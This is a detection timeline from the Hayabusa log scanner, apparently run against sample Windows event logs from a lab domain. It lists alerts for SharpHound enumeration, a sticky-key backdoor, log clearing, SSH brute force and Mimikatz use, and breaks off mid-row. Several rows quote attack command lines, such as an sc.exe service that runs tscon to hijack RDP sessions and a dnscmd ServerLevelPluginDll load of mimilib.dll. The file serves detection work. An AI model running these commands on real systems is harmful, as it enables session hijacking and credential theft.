0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.762 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.762 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.771 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.771 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.772 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.773 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.773 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.773 +00:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.774 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.775 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 08:58:38.775 +00:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 12:06:57.954 +00:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 12:06:57.954 +00:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation_sysmon/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 12:07:07.639 +00:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-14 20:39:33.214 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.382 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.382 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.382 +00:00,fs01.offsec.lan,4688,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_builtin/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:39:35.406 +00:00,fs01.offsec.lan,4697,info,Persis,Service Installed,Name: hijackservice | Path: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x13b593d,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-14 20:40:16.839 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.846 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.846 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.853 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:16.856 +00:00,fs01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:18.194 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:18.327 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:26.942 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.455 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.640 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.676 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 20:40:29.706 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-14 21:01:05.352 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:05.352 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:05.358 +00:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:07.150 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:01:37.111 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:02:14.789 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-14 21:02:35.208 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-18 21:18:40.607 +00:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:18:40.607 +00:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:23:27.038 +00:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:23:27.038 +00:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-18 21:30:17.318 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-18 21:30:17.318 +00:00,rootdc1.offsec.lan,4688,high,Evas,DNS ServerLevelPluginDll Install,,rules/sigma/process_creation_builtin/proc_creation_win_dns_serverlevelplugindll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-18 21:30:17.318 +00:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-18 21:33:49.548 +00:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-18 21:33:49.548 +00:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 12:49:31.863 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:46.875 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:46.876 +00:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:46.876 +00:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:52.315 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:52.315 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:53.378 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:53.378 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.043 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.043 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.662 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.662 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.945 +00:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 12:49:54.945 +00:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-21 20:43:07.153 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:07.153 +00:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-21 20:43:18.227 +00:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | 